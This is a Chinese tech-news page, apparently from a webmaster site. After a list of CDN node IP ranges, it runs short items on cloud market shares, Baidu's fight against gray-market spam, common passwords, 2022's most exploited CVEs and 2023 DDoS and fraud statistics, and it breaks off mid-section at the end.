117.147.214.1-117.147.214.255,百度云加速台州节点 117.147.215.1-117.147.215.255,百度云加速台州节点 182.150.0.1-182.150.0.255,百度云加速成都节点 182.150.1.1-182.150.1.255,百度云加速成都节点 117.27.149.1-117.27.149.255,百度云加速福州节点 139.215.133.1-139.215.133.255,百度云加速长春节点 111.132.134.1-111.132.134.255,百度云加速北京节点 103.21.244.1-103.21.247.255,百度云加速海外合作节点 103.22.200.1-103.22.203.255,百度云加速海外合作节点 103.31.4.1-103.31.7.1,百度云加速海外合作节点 104.16.0.1-104.31.255.255,百度云加速海外合作节点 108.162.192.1-108.162.255.255,百度云加速海外合作节点 131.0.72.1-131.0.75.255,百度云加速海外合作节点 141.101.64.1-141.101.127.255,百度云加速海外合作节点 162.158.0.1-162.159.255.255,百度云加速海外合作节点 172.64.0.1-172.71.255.255,百度云加速海外合作节点 173.245.48.1-173.245.63.255,百度云加速海外合作节点 188.114.96.1-188.114.111.255,百度云加速海外合作节点 190.93.240.1-190.93.255.255,百度云加速海外合作节点 197.234.240.1-197.234.243.255,百度云加速海外合作节点 198.41.128.1-198.41.255.255,百度云加速海外合作节点 199.27.128.1-199.27.135.255,百度云加速海外合作节点 #### 2021年百度统计打击黑灰产大事记 百度统计自去年12月收到客户举报,存在一小批违法犯罪分子利用百度统计进行恶意推广,以达到其盈利目的。 对此我们高度重视,一直持续关注打击黑灰产,保障客户权益。 2021年已经过去大半,这半年来与黑灰产业的持续斗争取得了可喜的成绩,现就我们所做的努力和大家分享: 2021年1月,百度统计内部升级黑灰产屏蔽策略,升级后的策略支持屏蔽40余种的黑灰产信息。2021年1月,百度统计联合法务部对某黑灰产获利者进行打击,嫌疑人徐某在武汉市被抓获,被采取刑事强制措施。 2021年2月,启动日屏蔽、周复盘策略,对攻击的黑灰产信息进行识别、屏蔽处理,屏蔽黑灰产信息上千条,每日阻挡灰产攻击量高达千万pv,避免上万站点受到黑灰产的影响。 2021年3月,通过功能迭代,阻断黑灰产通过统计邮件进行恶意推广14.7万封,彻底封堵此传播路径。 2021年4月,多次迭代升级屏蔽策略,机器识别加人工巡查手段,堵住屏蔽漏洞10余个,守护数万用户站点安全。2021年5月,加强打击搜索推广变体词(不法分子为躲避监管,对相关词进行字体替换/顺序改变等)2.7万余条。 2021年6月,百度统计再次协同公安法务部锁定黑灰产业链嫌疑人王某,并对嫌疑人实施抓捕。在此正告黑灰产,不要心存侥幸,打击黑灰产,坚决不手软!百度统计重视客户利益和体验,一切违法犯罪行为都不容忽视!若您在使用过程中受到黑灰产的困扰,可通过我们的邮箱:ext_tongji_reply@baidu.com 进行举报反馈,我们将有专门工作人员第一时间核实处理。 #### 2021年第一季度中国云市场规模超300亿 阿里云第一 腾讯云华为云第二 7月29日消息:据IDC最新发布的2021年第一季度中国公有云市场数据显示,季度内IaaS+PaaS市场规模达46.32亿美元(301亿人民币),其中阿里云排名第一,市场份额为40%,腾讯云、华为云分别位列第二、三名,市场份额均为11%。 整体来看,中国公有云市场增速超过全球增速。据IDC2020年全球公有云市场报告,全球公有云市场增速为24.1%,与中国市场增速差距明显。 一季度市场前名排名保持稳固,前五名占有市场份额达77%,出现较为显著的马太效应。报告称一季度市场与2020年整年数据讲述相比转变不大,仅天翼云份额缩短0.7个百分点,AWS增添1个百分点。 #### 2021年第七批11家非法社会组织网站被依法关停 11月25日消息:据新华网报道,近日,民政部、中央网信办、工业和信息化部深入贯彻落实党中央决策部署,持续发力,精准打击,依法关停了2021年第七批11家非法社会组织网站及其新媒体账号,清除了有关关联网页。 自今年3月20日进一步打击整治非法社会组织专项行动以来,民政部会同有关部门,依据《中华人民共和国网络安全法》《互联网信息服务管理办法》等有关法律法规,对已取缔的非法社会组织的网站进行排查,前期已分六批次关停了67家仍在运营的非法社会组织网站及其开办的微信、微博等新媒体账号,进一步夯实了线下打击整治成果,巩固了线上线下治理闭环。 民政部将持续保持高压打击态势,加强网络监测与排查,线上线下同步查处,坚决铲除非法社会组织的滋生土壤。对于性质恶劣、屡教不改的非法社会组织发起人,还将提请工信部门依法纳入违法互联网站(主办者)黑名单。欢迎社会各界登录中国社会组织政务服务平台(www.chinanpo.gov.cn),通过“投诉举报”栏目,提供涉嫌非法社会组织活动信息、主要负责人及骨干人员的线索信息。 附:2021年第七批被关停网站的11家非法社会组织名单 1.中国数字仿真联盟 2.中国洗车行业联盟 3.中国泰山北斗联盟 4.中国仿真技术产业联盟 5.中国服务机器人产业联盟 6.中国新世纪学习型家庭全国联盟 7.中国城市清洁清洗管理协会 8.北京汉服协会(汉服北京志愿服务协会) 9.中国华夏万里行书画家协会及其下设机构 10.中国集邮文化中心 11.国际易学风水研究会承德分会 #### 2021年网络攻击同比增长 50%!主要因apache Log4J 漏洞影响! 1 月 12 日消息,网络安全公司 Check Point Research 近日发布了 2021 年安全报告,2021 年每周对企业网络的总体攻击增加了 50%。 报告称,在全世界互联网上最严重的漏洞之一(每小时有数百万次攻击试图利用apache Log4J 漏洞)不到一个月后,2021 年就网络安全而言是创纪录的一年。 从 2020 年中期到 2021 年底,网络攻击的数量呈上升趋势。这一趋势在年底达到了历史最高水平,在全球范围内达到每个组织每周 925 次网络攻击的峰值。总体而言,与 2020 年相比,研究人员在 2021 年发现每周对企业网络的攻击增加了 50%。 此外,教育 / 研究是 2021 年遭受攻击最多的行业,每个组织平均每周发生 1,605 次攻击,比 2020 年增加了 75%。紧随其后的是政府 / 军事部门,每周有 1,136 次攻击(增加 47%),以及通信行业,每个组织每周有 1,079 次攻击(增加 51%)。 按地理位置划分,非洲在 2021 年经历了最多的攻击,每个组织平均每周发生 1,582 次攻击,比 2020 年增加了 13%。 亚太地区,每个组织平均每周发生 1,353 次攻击(增加 25%);拉丁美洲,每周发生 1,118 次攻击(增加 38%);欧洲,每周发生 670 次攻击(增加 68%);北美洲,每个组织平均每周发生 503 次攻击(增加 61%)。 Check Point Software 数据研究经理 Omer Dembinsky 表示,“网络攻击数量在年底达到顶峰,主要是因为 Log4j 漏洞的利用。新的渗透技术和规避方法使黑客更容易执行恶意的意图。” 去年 11 月 24 日阿里云发现了 Log4j2 安全漏洞隐患后率先向 Apache 基金会披露了该漏洞,由于漏洞利用门槛不高、Log4j 应用范围广,所以这次 Log4j 漏洞事件引发的安全影响十分深远。 #### 2022 年互联网上最常用的密码是什么? 11月28日消息:密码管理服务 NordPass 联合独立研究机构发布了一项年度密码研究。根据结论,2022年最常用的密码仍然是 password、123456、123456789、guest 和 qwerty 等易于猜测的重复、简单组合。 对于不重要的密码,大部分人都会选择容易记忆的数字或短语。破解大部分常用密码只需要不到1秒钟,少数可能需要10秒或更长时间,比如 col123456。NordPass 还公布了与密码趋势相关的统计:在奥斯卡奖颁奖季节使用 Oscars 作为密码的频率会大幅增加,在流行电影电视剧放映期间同名密码也会大增,比如 batman、euphoria 和 encanto。 NordPass建议,设置密码首先应确保它至少有12个字符的长度,并以大/小写字母与数字和符号相结合。更好的方式是使用密码生成器并且定期更换密码。不在不同的账户上重复使用密码也是非常重要,我们大多数人可能都会犯这样的错误,同时还要定期查看账户,看看哪些账户你不再使用,可以关闭以减少你的网上足迹。 #### 2022 年全球科技富豪财富缩水排行 北京时间 1 月 9 日早间消息,据报道,在刚刚结束的 2022 年,全球科技股发生了大跌,科技大亨们的财富也随之大幅缩水。据统计,去年,全球十大科技富豪的个人财富一共蒸发了 5750 亿美元(当前约 3.93 万亿元人民币)。 科技股大跌的原因有很多,其中包括全球许多国家日益高涨的通货膨胀、美元汇率太过于强势,以及在线广告行业低迷的冲击等等。 根据彭博亿万富翁指数,以下是一些全球知名科技富豪 2022 年的财富缩水情况: 史蒂夫・鲍尔默,微软前任首席执行官,损失 194 亿美元 从 2000 年到 2014 年,鲍尔默担任微软公司首席执行官,他拥有大量微软股票,个人财富多寡也和微软股票价格紧密挂钩。在去年底,鲍尔默个人财富总额为 862 亿美元。 2022 年,微软业务增长放缓,主要原因是全球个人电脑需求下降,美元汇率升值,微软 Windows 操作系统的销售收入下降。去年,微软股价大跌了 28%。而在新的一年里,微软提醒投资人,全球个人电脑的销售仍将持续低迷。 比尔・盖茨,微软联合创始人,财富缩水 286 亿美元 截止去年底,盖茨个人财富总额为 1100 亿美元。盖茨的财富分布广泛,包括许多被投资公司的股权、房地产、土地等等。不过盖茨持有的微软股票依然是最重要的个人财富组成部分。 微软业务低迷和股价变动等原因,请参见上述鲍尔默部分。 麦肯齐・斯格特,小说家和慈善家,去年损失 373 亿美元 麦肯齐是全球大富豪贝索斯的前妻,她目前持有亚马逊 3% 的股权,是个人财富重要来源。去年,亚马逊股票价格暴跌近一半,影响了麦肯齐的财富。截止去年底,她的个人财富总额为 190 亿美元。 去年底,在一篇博文中,麦肯齐表示,在 2022 年已经一共给 343 家慈善组织捐助了 20 亿美元,主要用于支持福利有所欠缺的社区。 谢尔盖・布林,谷歌联合创始人,损失 440 亿美元 去年,全球网络广告行业低迷,冲击了谷歌等依赖网络广告的科技企业,去年,布林和谷歌另外一位创始人拉里・佩奇,一共损失了 890 亿美元的个人财富。截止去年底,布林的个人财富余额高达 795 亿美元。 和佩奇一样,布林主要的个人财富表现为谷歌母公司 Alphabet 的股权。 拉里・佩奇,谷歌联合创始人,损失 453 亿美元 截止去年底,佩奇的个人财富总额为 831 亿美元,主要来自于他持有的谷歌母公司 Alphabet 的 6% 股权。 去年,Alphabet 放缓了社会招聘,据悉还削减了员工出差和外勤福利。 马克・扎克伯格,Meta 首席执行官,损失 799 亿美元 在 2021 年年底,扎克伯格曾经是全球第六大富豪,但是在去年底,扎克伯格在全球富豪榜上仅名列 25 名,个人财富总额为 456 亿美元。 Facebook 改名而来的 Meta 公司,去年营收大跌,主要原因是全球经济面临衰退的风险,网络广告市场低迷。 去年秋天,Meta 解雇了 1.1 万名员工,以削减运营成本。不过与此同时,扎克伯格痴迷于所谓的元宇宙概念,依然在大举投资。 杰夫・贝索斯,亚马逊和蓝色起源公司创始人,损失 852 亿美元 2021 年,贝索斯辞去了亚马逊首席执行官的职务,但目前依然是公司最大股东。去年亚马逊股价大跌近一半,在去年底,贝索斯的个人财富跌到了 1070 亿美元。 埃隆・马斯克,特斯拉、SpaceX 和 Twitter 首席执行官,损失 1320 亿美元 最近,马斯克丢失了全球第一大富豪的桂冠(被法国奢侈品集团 LVMH 的首席执行官伯纳德・阿尔诺取代)。截止去年底,马斯克个人财富总额为 1380 亿美元,依然是全球第二大富豪。 但吉尼斯世界纪录官方消息,自 2021 年 11 月以来,马斯克的净资产损失了近 2000 亿美元,打破了历史上个人财富损失最大的吉尼斯世界纪录。 马斯克大部分财富来自于特斯拉公司股票,不过去年,特斯拉股价大幅暴跌近七成,暴跌的其中一个原因,是投资人担心马斯克在自己收购的 Twitter 公司投入太多精力,会影响到特斯拉的业务发展。 冲击特斯拉股价的另外一个原因,是全球纯电车市场需求低迷。 #### 2022 年第三季度中国云服务公司市场占有率排名:百度排第四 12月12日 消息:科技市场独立分析机构Canalys发布数据称,2022年第三季度,中国大陆的云基础设施服务支出同比增长8%,达到78亿美元,占全球云支出的12%。自2022年第一季度以来,年增长率已经连续三个季度放缓,首次跌破10% 。 据分析,本季度,中国四个头部云厂商依然是阿里云、华为云、腾讯云和百度智能云。它们在本季度实现8% 的增长后,四大头部云厂商合计占总支出的80%。 2022年第三季度,阿里云引领了云基础设施服务市场。实现同比增长4% 后,占总支出的36%。这是阿里云的增幅首次跌至个位数。其增长主要来源于客户续约,但云消费和交易规模低于预期。 华为云的市场份额占比19%,是2022年第三季度第二大云服务提供商。该厂商本季度的增长超过中国云服务支出的总体增长,市场份额略有增加。 腾讯云占据了中国云市场16% 的份额。腾讯云仍致力于缩减亏损项目,并专注于提高盈利能力。 百度智能云排名第四,市场份额占比9%,年度增长12%。百度智能云已经连续三个季度比中国整体云市场的的增长速度更快。 #### 2022上半年国内IaaS 市场份额阿里云大降 天翼云大增 2022年10月26日,IDC发布的《中国公有云服务市场(2022上半年)跟踪》报告显示:2022上半年中国公有云服务市场整体规模(IaaS/PaaS/SaaS)达到 165.8 亿美元。其中 IaaS 市场同比增长 27.3%,PaaS 市场同比增速为 45.4%。从IaaS+PaaS市场来看,2022上半年同比增长30.7%,与2021上半年增速(48.7%)相比下滑18%。2022上半年,IaaS市场以及IaaS+PaaS市场竞争格局呈现一定变化,虽然排名前五的云厂商一直占据70%以上的市场份额,但在其他竞争对手的强烈攻势下,前五厂商的集中度比2021上半年略有下降。 公有云 IaaS市场份额: 公有云 IaaS+PaaS 市场份额: 厂商表现: 阿里云 IaaS 市场份额减少 4.1% 至 34.5%;IaaS+PaaS 市场份额减少 4.4% 至 33.5%。阿里云在强化数据中心、芯片、数据库、大数据和 AI 等核心技术能力构建的同时,深耕产业互联网解决方案的挖掘和落地,并不断扩大海内外区域的覆盖以及全方位生态能力的建设。 华为云 IaaS 增加 0.4% 至 11.6%;IaaS+PaaS 增加 0.2% 至 11.1%。华为云 IaaS+PaaS 跃居第二位。华为云持续深耕行业数字化转型,在保持金融、政府等传统行业优势的同时,不断在游戏、电商、汽车等领域发力,并加速了海外扩张的步伐。 腾讯云 IaaS 减少 0.8% 至 10.3%;IaaS+PaaS 减少 0.5% 至 10.7%。 腾讯云更加聚焦PaaS和SaaS产品的研发,聚焦健康可持续发展战略,赋能产业数实融合。腾讯云(IaaS+PaaS+SaaS)市场份额位居第二。其中 PaaS 增速同比达到 46.7%。 天翼云 IaaS 增加 1.4% 至 11%;IaaS+PaaS 增加 1.1% 至 9.4%。天翼云 IaaS 跃居第三位。天翼云在持续强化云底座产品技术创新和丰富度的同时,加速实现产数业务、生态能力与云能力的全面融合。 AWS  IaaS 增加 1.6% 至 8.1%;IaaS+PaaS 增加 1.5% 至 9%。AWS持续领航云服务商出海业务的同时加快中国市场拓展,在北京区域推出免费套餐,涵盖了亚马逊云科技计算、存储、数据库、分析、AI/ML以及物联网等共39项重点服务。 其他 IaaS 增加 1.6% 至 24.6%;IaaS+PaaS 增加 2.1% 至 26.3%。中国移动持续提升算网能力和产品能力,深入行业,持续加大视频云、安全云、监控云、园区云等场景的深耕。中国联通打造安全数智的“联通云”,并以专属定制、经济实用、多云协同的云服务为目标,持续打造产业数字赋能解决方案。百度智能云持续深化“云智一体、深入产业”的战略,打造适合AI的云底座,加深AI与产业的融合。浪潮云通过深耕IoT、边缘计算、数字孪生、大数据等场景驱动了不少能源、交通和服务等行业企业上云。京东云以数智供应链和混合多云为战略驱动,助力行业龙头和大型国央企构建产业云。 #### 2022年一季度中国云服务商市场占有率排行榜 6月8日 消息:今日,全球科技市场独立分析机构 Canalys发布了2022年第一季度中国云服务市场相关业务数据。 Canalys数据显示,2022年第一季度,中国大陆云基础设施服务支出同比增长21%,达到73亿美元,与2021年第一季度相比,增长13亿美元,占全球云基础设施支出的13%。尽管云服务总支出低于预期,但中国市场仍然领跑全球云服务市场的增长。 自2022年3月以来,新冠疫情再度卷土重来,影响了许多项目的正常进行,从而抑制了中国云基础设施服务市场的总体收入。然而,随着中国在新基建领域布局的加速 ,以及企业数字化转型的迫切需求,云服务供应商将迎来新的发展机遇。 2022年第一季度,中国云基础设施服务的市场格局并未发生明显改变,排名前四的云服务供应商依然是阿里云、华为云、腾讯云和百度智能云。受益于云计算使用规模的扩张,这四大云服务供应商占中国云服务总支出的79%,同比增长了19%。 具体来看,2022年第一季度,阿里云继续引领云基础设施服务市场,占总支出的36.7%,同比增长12%。长久以来,阿里云一直都是中国云服务市场的领导者,并且仍在持续扩大影响力。 华为云是本季度的第二大云服务供应商,市场份额占比18.0%,同比增长11%。自去年推出“云云协同”战略以来,华为云已经通过与华为终端业务(个人电脑、智能手机、物联网)进行生态整合,赢得了100多家企业的合作。 作为第三大供应商,腾讯云的市场份额占比为15.7%。受其内部业务的调整和战略变化的影响,腾讯云本季度的收入出现了环比下降。2022年,腾讯云的战略重点会逐渐聚焦于盈利性的增长,而非业务量的增长。腾讯云本季度的收入主要来自文创、零售和游戏行业。 第四大供应商百度智能云的市场份额占比为8.4%,增长达43%。凭借云服务与AI技术相结合的差异化优势,以及对其业务的大量投资,百度智能云本季度保持了高速增长。 #### 2022年中国大陆云计算排名:阿里云、华为云、腾讯云、百度智能云前四 9 月 9 日消息,Canalys 最新报告显示,中国大陆的云基础设施服务支出同比增长 11%,在 2022 年第二季度达到 73 亿美元,占全球整体云支出的 12%。与全球云服务市场 33% 的高增长势头相比,中国市场增长明显放缓,首次跌破 20%。 报告指出,阿里云、华为云、腾讯云和百度智能云依然保持了它们在中国云计算市场的领导地位。前四家供应商占中国总支出的 79%,但与过去几个季度相比,这四家的增长率都有所下降。 阿里云本季度市场份额占比 34%,同比增长了约 10%,与上一季度相比市占率下降了 2% 左右。华为云作为第二大云厂商,在本季度同比增长 11%,占整体市场的 19%。腾讯云排名第三,占中国云计算市场的 17%。6 月,腾讯云宣布其所有内部业务(包括 QQ 和微信)已经完全迁移到云端,此举大大降低了其内部 IT 成本。第四个供应商百度智能云,占据了 9% 的市场,同比增长 25%。 ▲ 图源:Canalys #### 2022年市场占有率最高的桌面浏览器仍是Google Chrome 自从微软重新推出由Chromium引擎驱动的Microsoft Edge以来,浏览器之争变得更加激烈,但这并不一定意味着Google浏览器准备放弃领先的地位,完全没有。StatCounter提供的2022年3月的数据显示,Chrome浏览器继续成为桌面浏览器之王,份额不低于67.29%。 换句话说,每10台电脑中就有近7台在运行Chrome浏览器,至少可以说这是令人印象深刻的,尤其是因为这些电脑中的大部分都在运行Windows。 Windows的默认浏览器是Internet Explorer(旧版本)或Microsoft Edge(新版本),因此10个用户中有7个放弃了微软的应用程序,转而使用Google浏览器。 另一方面,现代版的微软Edge也在获得动力,Edge现在是第二大使用的桌面浏览器,份额为9.65%。显然,它离挑战Google浏览器的统治地位还很远,但另一方面,它已经成功超越了竞争对手Firefox和Safari。 在这一点上,Safari仍然是第三大最受欢迎的选择,份额为9.56%,而Firefox在排行榜上仅排名第四,份额为7.57%。Opera则以2.81%的份额远远落后。 然而,值得强调的是,Safari只安装在macOS上,因为不再提供Windows版本。它的市场份额表明,大多数苹果用户坚持使用默认浏览器,不安装第三方替代品,如Google浏览器和微软Edge。 毫无疑问,Chrome浏览器将继续成为多年来的首选,但从长远来看,微软Edge最终会发展得多快,这肯定很有趣。 #### 2022年有哪些最常被利用的漏洞? 黑客攻击变得一年比一年高级和复杂,因此现在追踪了解安全漏洞比以往任何时候都来得重要。本文着重介绍了2022年恶意威胁分子利用的一些最危险的漏洞。 1. Follina(CVE- 2022 – 30190) CVE-2022-30190(非正式名称为“Follina”)在2022年5月被披露,它是微软Windows支持诊断工具(MSDT)中的一个远程代码执行漏洞,允许远程攻击者在目标系统上执行任意shell命令。 自从该漏洞被公开披露以来,安全研究人员观察到多起涉及利用该漏洞的案例,包括与俄罗斯政府有关的威胁分子(Sandworm、UAC-0098和APT28)针对乌克兰的组织和政府机构发起的多次网络钓鱼攻击,旨在用窃取信息的恶意软件感染受害者,以及针对欧美政府的网络间谍活动。Follina漏洞还被用来植入远程访问工具,比如Qbot和AsyncRAT,并在Windows系统上部署后门。 2. Log4Shell(CVE- 2021 – 44228) 尽管Log4Shell漏洞在2021年底才被披露,但它在最常被利用的漏洞排行榜中依然名列前茅,仍然是网络犯罪分子在地下论坛上最常讨论的漏洞之一。 CVE-2021-44228是一款广受欢迎的Apache Log4j开源日志实用程序中的远程代码执行漏洞。如果威胁分子利用了该漏洞,就可以向受影响的系统发送一个特别精心设计的命令,执行恶意代码,并操控受害者的机器。自2021年12月以来,现已修复的Log4Shell漏洞一直被多个威胁分子大肆利用,从加密货币挖矿软件、DDoS僵尸网络、勒索软件团伙和初始访问代理,到与伊朗、朝鲜和土耳其政府有关联的政府撑腰的黑客,不一而足。 最近,有人观察到威胁分子使用Log4Shell在未打补丁的、面向公众的VMware Horizon和Unified Access Gateway(统一接入网关)服务器上部署恶意软件。 3. Spring4Shell(CVE- 2022 – 22965) CVE-2022-22965(Spring4Shell或SpringShell)是来自VMware的一种广泛使用的开源Java框架Spring Framework中的远程代码执行漏洞,以上面提到的Log4Shell漏洞命名。一旦攻击者实现了远程代码执行,就可以安装恶意软件,或者利用受影响的服务器作为初始立足点,以提升权限,进而攻击整个系统。 虽然Spring4Shell不像Log4Shell那么普遍,也不容易被利用,但众多组织不应该轻视该漏洞,因为它已经变成了网络犯罪分子手里的武器,用于部署加密货币挖矿软件,并且用在了使用臭名昭著的Mirai恶意软件的僵尸网络。 4. F5 BIG-IP(CVE-2022-1388) CVE-2022-1388于2022年5月首次被披露,是另一个值得关注的严重漏洞。该漏洞影响F5 BIG-IP软硬件套件中的BIG-IP iControl REST身份验证组件;一旦被利用,允许未经身份验证的攻击者以“root”权限在BIG-IP网络设备上执行命令。在过去的几个月里,研究人员发现了旨在擦除设备内容或投放web shell恶意脚本的多起攻击企图利用该漏洞。 5. 谷歌Chrome零日漏洞(CVE-2022-0609) 现已得到修补的CVE-2022-0609是谷歌Chrome的动画组件中的远程代码执行漏洞,两起独立的与朝鲜有关的黑客活动(名为“Operation Dream Job”和“Operation AppleJeus”)利用了该漏洞,这两起黑客活动攻击美国的媒体、IT、加密货币和金融技术等行业的多家组织。 6. 微软Office漏洞(CVE-2017-11882) 古老的微软Office远程代码执行漏洞(CVE-2017-11882)于2017年首次被披露,至今仍是黑客论坛上最热议的漏洞之一。虽然微软在近五年前就发布了CVE-2017-11882的官方补丁,但许多组织依然没有打上补丁,这给企图趁虚而入的网络犯罪分子提供了可趁之机。在最近的一个案例中,威胁分子利用这个未打补丁的漏洞来部署SmokeLoader恶意软件,以便投放其他恶意软件,比如TrickBot。 7. ProxyNotShell(CVE-2022-41082和CVE-2022-41040) ProxyNotShell指两个分别被编号为CVE-2022-41082和CVE-2022-41040的高危漏洞,允许访问PowerShell Remoting的远程用户在易受攻击的Exchange系统上执行任意代码或执行SSRF攻击。这两个漏洞于2022年9月首次被披露,据称被黑客利用了数月。微软证实,黑客们利用ProxyNotShell漏洞,在被攻击的Exchange服务器上部署了China Chopper web shell恶意脚本。这两个漏洞在微软发布的11月周二补丁包中都已得到了解决。 8. Zimbra协作套件漏洞(CVE-2022-27925和CVE-2022-41352) 今年早些时候,安全研究人员向公众披露了影响一种广泛使用的电子邮件和协议平台:Zimbra协作套件(ZCS)的两个漏洞(CVE-2022-27925和CVE-2022-41352)。CVE-2022-27925允许实现远程代码执行,而CVE-2022-41352可以被用来将任意文件上传到易受攻击的实例。在2022年7月至10月期间,研究人员发现了多起攻击,包括政府撑腰的黑客利用这些漏洞入侵了全球成千上万台ZCS服务器。 9. Atlassian Confluence RCE漏洞(CVE-2022-26134) 运行Atlassian Confluence软件的服务器对网络犯罪分子来说之所以是诱人的目标,是由于如果不打补丁,它们可能提供对企业网络的初始访问,因此保护它们显得至关重要。6月份,包括Kinsing、Hezb和Dark在内的几个僵尸网络使用Atlassian Confluence的远程执行漏洞(CVE-2022-26134),在未打补丁的安装系统上部署挖掘加密货币的恶意软件。 10. Zyxel RCE漏洞(CVE-2022-30525) 另一个值得注意的严重漏洞就是CVE-2022-30525,这个操作系统命令注入漏洞影响众多企业的Zyxel防火墙和VPN设备。一旦成功利用该漏洞,攻击者可以在不需要验证身份的情况下远程注入任意命令。考虑到这个安全问题的严重性以及可能带来的破坏,美国国家安全局(NSA)网络安全主任Rob Joyce发推文警告用户有人企图利用该漏洞,敦促用户更新易受攻击的Zyxel软件。 #### 2022年阿里云站长大量未备案域名被封 有站长反馈: 在阿里云的域名因为未备案,扫描到有违规内容、涉及支付、涉及采集类型、涉嫌破解侵权电影视频小说动动漫等,只要有点擦边一律有被墙hold风险,已经有大量站长域名被hold了,关键最近不只是封禁域名,开始连服务器一起封禁,不提醒你直接给你搞封禁。 看来阿里云要玩真的,阿里云之前一直都是一些擦边球网站的聚集地,那些网站往往都是没有备案的,做着一些游走在法律边缘的行业,这次阿里云封禁事件,估计是因为去年多次被工信部点名不得不严肃处理了。 建议各位站长老老实实做站吧,可以赚钱的行业大把,不要盯着那些违法的行业来做,否则得不偿失。 #### 2023 年美国人因诈骗损失创纪录的 100 亿美元 根据美国联邦贸易委员会(FTC)的最新警告,2023年美国人因诈骗损失达到了创纪录的100亿美元,同比增长14%。这表明在过去的一年里,网络欺诈问题在美国持续加剧,给消费者带来了巨大的经济损失。 具体来说,投资诈骗和冒名顶替诈骗是最常见的欺诈形式,造成了最大的损失。投资诈骗造成的损失超过46亿美元,超过了任何其他类别,这一金额比2022年增加了21%。冒名顶替诈骗则造成了近27亿美元的损失。此外,银行转账和加密货币造成的损失比所有其他方法损失的总和还要多。 值得注意的是,这些数字可能只是冰山一角,因为许多诈骗行为并未被报告。例如,2023年,FTC在其消费者哨兵网络(Sentinel)安全在线数据库中新增了540万份消费者报告,其中通过该机构的IdentityTheft.gov网站收到了超过110万份身份盗窃报告。 为了应对这个问题,FTC呼吁消费者提高防范意识,不要轻信陌生人的电话、短信或电子邮件,不要随意点击可疑的链接或附件,不要向不认识的人汇款或提供个人信息,不要贪图高额的回报或奖品,不要轻易下载或安装未知来源的软件。如果发现自己或亲友受到欺诈或身份盗窃的威胁,应及时报警和联系相关机构,寻求帮助和解决方案。 #### 2023年了 你觉得做网站还有前途吗 在2023年,网站作为在线业务的基本形式和重要组成部分,仍然具有广阔的发展前景。尽管移动应用程序和社交媒体等新技术应用的兴起,改变了人们获取信息和交流的方式,但网站作为展示品牌和产品、提供服务和信息的主要渠道,仍然保持着不可替代的地位。以下是一些关于网站仍然有前途的理由: 网站仍然是企业品牌和产品的重要展示平台。一个好的网站可以展示企业的形象,吸引潜在客户,提升企业的品牌形象和知名度。 网站仍然是信息传播的重要渠道。人们仍然使用搜索引擎寻找信息,网站仍然是他们获取信息的主要来源。 网站具有更好的可控性和定制性。相对于社交媒体和第三方平台,企业可以更好地控制网站内容和用户体验,实现更精准的定制化服务。 人们对于网站的需求在持续增长。随着新技术和新领域的涌现,人们对于更加智能、便捷、专业化的网站需求在不断增加,这为网站的发展提供了更多机遇。 虽然网站面临着新技术的冲击和市场竞争的挑战,但其作为网络世界的基石,仍然有着广阔的发展前景。对于网站开发者和创业者来说,仍然是一种值得追求和探索的职业和事业。 #### 2023年全球DDoS攻击态势 超大规模攻击异常活跃。2023年T级攻击异常活跃。超800Gbps攻击共计248次,和2022年基本持平。1月份中国电信安全团队监测到年度最大包速率攻击,峰值包速率高达972Mpps;10月份中国电信安全团队监测到年度最大带宽攻击,峰值带宽高达2.505Tbps。2023年8月,发生互联网史上最大应用层攻击,攻击峰值高达398Mrps1。2023年10月华为监测到最大规模的扫段攻击,230个C段先后遭受混合攻击。 攻击频次继续呈增长趋势。2023年攻击频次是2022年的1.6倍,是2021年的1.8倍。从全球看,针对APAC的攻击最活跃,占比88.83%。大流量攻击持续呈秒级加速态势,爬升速度再创新高,挑战防御系统响应速度。大流量攻击持续加速,爬升至400Gbps-500Gbps区间只需2秒;爬升至800Gbps-1Tbps区间,仅需10秒。 攻击复杂度持续提升,攻击威胁加剧。HTTP/HTTPS应用层攻击两级分化,高速攻击挑战WAF解密防御性能,低速攻击bypass WAF,高速、低速攻击混合,挑战防御系统有效性。一方面,HTTP2.0 Rapid Reset漏洞被利用,导致应用层攻击速率从2022年的千万级RPS跃迁至2023年的亿级RPS,挑战解密防御性能;另一方面,由数十万个僵尸发起的低速应用层攻击日渐常态化,绕过WAF检测,威胁加剧。OA漏洞被利用,引发TCP四层代理场景的互联网业务信任风险。为减少自身网络攻击威胁,某些无良互联网企业通过修改DNS记录,将攻击流量“零成本”转移至百度。 传媒和互联网、政府和公共事业、教育、金融依然是TOP4攻击目标行业。传媒和互联网、政府和公共事业、教育、金融攻击频次占比依次为59.88%、11.75%、2.98%、2.85%。能源行业和工业互联网受攻击频次占比连续三年增长。近三年,中国金融行业攻击频次呈持续增长趋势。全球攻击目标地域分布排序依次为APAC、LATAM、EMEA、AMER,中国TOP3攻击目标地域分布为吉林、山东和广东。攻击目标按大洲分布为APAC、LATAM、EMEA、AMER,占比依次为83.81%、12.51%、2.02%、1.66%;中国TOP3攻击目标地域分布为吉林、山东和广东,占比依次为32.80%、9.41%、8.68%。 以上数据来自源于:天翼安全科技有限公司、联通数科安全、百度安全、Nexusguard、中国移动云能力中心、中国移动卓望公司、清华大学、华为联合发布的《2023年全球DDoS攻击现状与趋势分析》报告 #### 2023年全球DDoS攻击现状与趋势分析报告 本报告由天翼安全科技有限公司、联通数科安全、百度安全、Nexusguard、中国移动云能力中心、中国移动卓望公司、清华大学、华为联合发布 2023_annual 关键信息摘要: 2023年全球DDoS攻击现状与趋势分析报告由天翼安全科技有限公司、联通数科安全、百度安全等机构联合发布。 报告指出,DDoS攻击的态势包括攻击强度、频次、速度和复杂度的持续增长。 专家观点强调了瞬时泛洪攻击的秒级加速、高速加密攻击对解密防御性能的挑战,以及低速CC攻击绕过WAF的问题。 报告分析了DDoS僵尸网络的态势,包括僵尸家族分布和C2地域分布。 典型DDoS攻击分析涵盖了扫段攻击和DNS攻击,指出了攻击手法的复杂性和防御挑战。 现状与趋势: 2023年DDoS攻击频次是2022年的1.6倍,是2021年的1.8倍,APAC地区攻击最活跃。 大流量攻击持续呈秒级加速态势,挑战防御系统响应速度。 攻击复杂度持续提升,攻击威胁加剧,特别是HTTP/HTTPS应用层攻击的两级分化。 肉鸡地域分布: 海外地域分布中,AMER、EMEA、APAC、LATAM的占比依次为33.34%、32.17%、30.42%、4.07%。 中国TOP3地域分布为河南、浙江和广东。 僵尸家族分布: DDoS僵尸家族以IoT和Linux为主,TOP5僵尸家族分别是Mirai、Gafgyt、Mozi、XorDDoS和Dofloo。 攻击目标行业分布: 传媒和互联网、政府和公共事业、教育、金融是TOP4攻击目标行业。 攻击目标地域分布: 